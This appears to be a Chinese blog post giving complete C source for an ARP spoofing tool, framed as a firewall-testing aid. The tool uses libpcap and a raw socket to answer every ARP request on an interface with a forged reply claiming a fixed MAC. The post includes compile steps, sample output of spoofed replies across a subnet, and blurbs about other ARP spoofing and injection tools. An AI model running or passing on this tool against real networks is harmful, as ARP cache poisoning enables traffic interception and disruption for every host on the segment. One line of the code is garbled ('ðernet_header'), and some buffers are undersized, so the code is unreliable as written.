做这个工具的目的不是为了搞破坏,只是为了做防火墙测试。
由于需要模拟生产数据包,因此需要自己动手写ARP欺骗程序来回应防火墙的ARP询问。
这个程序会一直监听某个网卡,一收到ARP询问就通过rawsocket构造一个ARP回应包发送出去。
本程序有两个部分,一个是收包,基于libpcap;另一个是发包,不依赖任何第三方类库,直接通过rawsocket从链路层开始构造ARP包发出去。
#include <pcap.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/ether.h>
#include <netpacket/packet.h>
#pragma pack(1)
unsigned char p_src_addr[15]; //src_ip buffer
unsigned char p_dst_addr[15]; //dst_ip buffer
unsigned char p_dst_mac[17]; //dst_mac buffer
unsigned char* p_src_mac = "AA:BB:CC:DD:EE:FF"; //defined mac
unsigned char* p_interface; //interface pointer
unsigned char buffer[8192]; //rawsocket data buffer
int s = -1; //socket handler
struct sockaddr_ll sa;
int offset = 0; //rawsocket data offset
u_int16_t handle_ethernet(u_char *args, const struct pcap_pkthdr* pkthdr, const u_char* packet)
{
struct ether_header *eptr; /* net/ethernet.h */
eptr = (struct ether_header *) packet;
return ntohs(eptr->ether_type);
}
struct myarphdr
{
unsigned short hw_type; /* hardware address */
unsigned short protocol_type; /* protocol address */
unsigned char hw_addr_len; /* length of hardware address */
unsigned char protocol_addr_len; /* length of protocol address */
unsigned short opcode; /*operate code 1 ask 2 reply*/
unsigned char src_mac[6];
struct in_addr src_ip;
unsigned char dst_mac[6];
struct in_addr dst_ip;
unsigned char padding[18];
};
int setup_eth_header(unsigned char* buffer, unsigned char* src_mac, unsigned char* dst_mac)
{
char s_mac[6];
sscanf(src_mac, "%x:%x:%x:%x:%x:%x", &s_mac[0], &s_mac[1], &s_mac[2], &s_mac[3], &s_mac[4], &s_mac[5]);
char d_mac[6];
sscanf(dst_mac, "%x:%x:%x:%x:%x:%x", &d_mac[0], &d_mac[1], &d_mac[2], &d_mac[3], &d_mac[4], &d_mac[5]);
struct ethhdr ethernet_header;
memcpy(ethernet_header.h_dest, d_mac, 6);
memcpy(ethernet_header.h_source, s_mac, 6);
ethernet_header.h_proto = htons(0x0806);
memcpy(buffer, ðernet_header, sizeof(struct ethhdr));
return sizeof(struct ethhdr);
};
int setup_arp_header(unsigned char* buffer, unsigned char* src_mac, unsigned char* dst_mac, unsigned char* src_address, unsigned char* dst_address){
char s_mac[6];
sscanf(src_mac, "%x:%x:%x:%x:%x:%x", &s_mac[0], &s_mac[1], &s_mac[2], &s_mac[3], &s_mac[4], &s_mac[5]);
char d_mac[6];
sscanf(dst_mac, "%x:%x:%x:%x:%x:%x", &d_mac[0], &d_mac[1], &d_mac[2], &d_mac[3], &d_mac[4], &d_mac[5]);
struct myarphdr arp_header;
arp_header.hw_type = htons(0x0001);
arp_header.protocol_type = htons(0x0800);
arp_header.hw_addr_len = (unsigned char)6;
arp_header.protocol_addr_len = (unsigned char)4;
arp_header.opcode = htons(0x0002);
memcpy(arp_header.src_mac, s_mac, 6);
arp_header.src_ip.s_addr = inet_addr(src_address);
memcpy(arp_header.dst_mac, d_mac, 6);
arp_header.dst_ip.s_addr = inet_addr(dst_address);
memset(arp_header.padding,0 , 18);
memcpy(buffer, &arp_header, sizeof(struct myarphdr));
return sizeof(struct myarphdr);
}
u_char* handle_arp(u_char *args,const struct pcap_pkthdr* pkthdr,const u_char* packet)
{
struct ether_header *eptr;
struct myarphdr *arp;
u_int length = pkthdr->len;
eptr = (struct ether_header*)packet;
arp = (struct myarphdr*)(packet + sizeof(struct ether_header));
length -= sizeof(struct ether_header);
if (length < sizeof(struct myarphdr))
{
printf("<somebody has replied!src_mac:%s ",ether_ntoa((const struct ether_addr *)&eptr->ether_shost));
printf("dst_mac:%s\n", ether_ntoa((const struct ether_addr *)&eptr->ether_dhost));
return NULL;
}
if(htons(arp->opcode) == 2){//arp reply
return NULL;
}
memset(p_dst_mac, 0, sizeof(p_dst_mac));
memcpy(p_dst_mac, ether_ntoa((const struct ether_addr *)&eptr->ether_shost), sizeof(p_dst_mac));
memset(p_src_addr, 0, sizeof(p_src_addr));
memset(p_dst_addr, 0, sizeof(p_dst_addr));
memcpy(p_src_addr, inet_ntoa(arp->dst_ip), sizeof(p_src_addr));
memcpy(p_dst_addr, inet_ntoa(arp->src_ip), sizeof(p_dst_addr));
if(s < 0){
s = socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
if(s < 0){
printf("Could not open raw socket.\n");
exit(-1);
}
}
memset(buffer, 0 ,sizeof(buffer));
offset = 0;
sa.sll_ifindex = if_nametoindex(p_interface);
offset = setup_eth_header(buffer, p_src_mac, p_dst_mac);
offset += setup_arp_header(buffer + offset, p_src_mac, p_dst_mac, p_src_addr, p_dst_addr);
if(sendto(s, buffer, offset, 0, (struct sockaddr *) &sa, sizeof(sa)) < 0){
printf("arp send error!\n");
exit(-1);
}else{
printf("[ARP]inter:%s src_mac:%s dsc_mac:%s src_ip:%s dst_ip:%s\n", p_interface, p_src_mac, p_dst_mac, p_src_addr, p_dst_addr);
}
return NULL;
}
void my_callback(u_char *args,const struct pcap_pkthdr* pkthdr,const u_char* packet){
u_int16_t type = handle_ethernet(args, pkthdr, packet);
if(type == ETHERTYPE_ARP){
handle_arp(args,pkthdr,packet);
}
}
int main (int argc, char* argv[]){
if(argc < 2){
printf("usaged:%s interface\n", argv[0]);
return 0;
}
p_interface = argv[1];
char ebuf[PCAP_ERRBUF_SIZE];
/*create capture handler of libpcap*/
pcap_t *pd = pcap_open_live (argv[1], BUFSIZ, 1, -1, ebuf);
/*start the loop of capture, loop 5 times, enter printer when capted*/
pcap_loop (pd, -1, my_callback, NULL);
pcap_close (pd);
if(s > 0){
close(s);
}
return 0;
}
编译后执行:
[root@cnszxxxx xxxx]# gcc -o arp_trick arp_trick.c -lpcap
执行效果如下:
[root@cnszxxxx xxxx]# ./arp_trick eth0
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:46:c9 src_ip:10.11.77.200 dst_ip:10.11.77.60
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:1d:9:9:bd:53
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:52:29 src_ip:10.11.77.200 dst_ip:10.11.77.79
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:50:56:83:2b:cd
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:f:1f:69:7b:fa src_ip:10.11.77.43 dst_ip:10.11.77.108
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:f:1f:69:7b:fa src_ip:10.11.77.56 dst_ip:10.11.77.108
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:16:1c src_ip:10.11.77.40 dst_ip:10.11.77.41
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:50:56:83:16:1c
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:1d:9:9:bd:53 src_ip:10.11.77.61 dst_ip:10.11.77.62
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:1d:9:9:bd:53 src_ip:10.11.77.40 dst_ip:10.11.77.62
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:1d:9:9:bd:53
分享到:
相关推荐
描述中提到的"一个基于arp欺骗工具的源码,欺骗目标ip可以插入指定代码",意味着这个源码不仅能够执行ARP欺骗,还具备在欺骗过程中向目标IP注入特定代码的能力。这可能涉及到网络嗅探、数据包构造和注入等高级技巧,...
标题中的“arp.rar_arp抓包工具_libpcap_libpcap qt_pcap arp_qt 抓包”揭示了我们讨论的主题是关于一个基于libpcap库,并使用Qt框架开发的ARP(Address Resolution Protocol)网络数据包捕获工具。这个工具主要用于...
《win-ArpSpoofer:基于libpcap和libnet的C语言实现Windows ARP欺骗工具详解》 在网络安全领域,ARP(Address Resolution Protocol)欺骗是一种常见的攻击手段,它通过篡改网络中的ARP缓存,使得数据包被错误地转发...
- **实现影响**:ARP工具的实现可能受到如“网络执法官”等已存在的网络管理软件的影响,这些软件可能有特殊的防护措施,使得ARP欺骗更加复杂。 - **参考文献**:文中提到了两篇重要的参考资料,一篇是TOo2y大侠的...
通过以上步骤,我们可以创建一个简单的ARP数据包捕获工具,用于监控网络中的ARP通信,这对于识别ARP欺骗、检测网络故障以及理解网络流量有极大的帮助。 在实际应用中,可能还需要结合其他工具和知识,例如,使用...
3. ARP欺骗防御:检查系统是否能够检测和防止ARP欺骗攻击,如使用反ARP欺骗工具(如`arpd`或`arpspoof`)进行测试。 4. 未响应的ARP请求:测试主机在没有收到响应时的行为,比如超时重试策略。 5. ARP广播:验证主机...
ARP欺骗是攻击者发送伪造的ARP响应,使得受害者将攻击者的MAC地址误认为是其他合法主机的MAC地址,从而将数据发送给攻击者,而非真正的目标。ARP缓存中毒是ARP欺骗的一种形式,它通过不断发送虚假的ARP消息,使受害...
3. 对网络嗅探和数据包解析有一定的了解,可能需要用到libpcap库或其他网络抓包工具。 4. 熟悉ARP攻击和ARP欺骗的实现方式,以及如何在程序中模拟这些攻击行为。 5. 了解飞秋或者类似的即时通讯软件的通信协议,以...
4. **ARP欺骗**:网络安全的一个重要话题,攻击者可以通过发送虚假的ARP响应来操纵 ARP缓存,将流量重定向到错误的设备,如中间人攻击。 5. **编程实现**:在Python、C、C++或其他编程语言中发送ARP数据包通常涉及...
ARP协议主要用于解决IP地址到物理地址(MAC地址)的映射问题,但同时也可能成为网络攻击的工具,如IP冲突、ARP欺骗和ARP溢出等。了解ARP数据包的工作原理及如何高效截取和分析这些数据包,对于监控网络流量、检测...
这个工具可能就是基于libpcap来实现的,可以实时监测网络接口上的数据包,记录其详细信息,包括源和目标地址、端口、协议类型等。 通过分析这个工具,用户不仅可以学习到网络嗅探的基本概念,还可以了解到如何在...
ARP扫描器是网络诊断工具,用于检测局域网内的ARP欺骗攻击。在本文中,我们将详细探讨易语言 ARP 扫描器源码的相关知识点,以及如何利用这些源码理解和实现网络扫描功能。 一、易语言基础 易语言的特色在于其简洁...
"欺骗",特别是ARP欺骗(Address Resolution Protocol),是一种网络攻击技术,通过伪造ARP响应误导目标设备将数据包发送至攻击者。T-ARP.CPP可能包含实现ARP欺骗的代码。在VC++中,可以使用WinPcap库(现在通常称为...
IP欺骗涉及改变数据包的源或目标IP地址,而ARP欺骗则是在局域网内篡改ARP缓存,将流量导向嗅探器。 **网络安全与隐私** 虽然网络嗅探器在故障排查和安全审计中有其价值,但它也带来了潜在的安全风险。未经授权的...
【网络抓包工具SharpPCap】是用于网络数据包捕获和分析的工具,它基于开源项目SharpPcap,此项目提供了.NET平台下利用libpcap/WinPcap库进行开发的API。SharpPcap支持多种网络协议,如Ethernet、IPv4、IPv6、TCP、...
ARP欺骗,或称ARP代理,是利用ARP协议的缺陷,通过发送虚假的ARP响应,将网络中其他设备的流量重定向到攻击者的机器上。在开发过程中,SharpPcap提供了发送和接收ARP数据包的功能,使得开发者能够实现这一过程。同时...
例如,`mitmf.py --iface <interface>`用来指定监听的网络接口,`--spoof --arp --target <target>`用于执行ARP欺骗,将受害者指向攻击者。 通过阅读MITMf.txt文件,你可以获取更详细的使用指南、示例以及可能的...
对于网络安全方面,嗅探器可以帮助检测潜在的攻击行为,如ARP欺骗、DNS篡改或者中间人攻击。通过分析数据包的源IP、目标IP和端口,以及数据包的内容,我们可以识别出异常模式并及时采取防御措施。 在实际操作中,...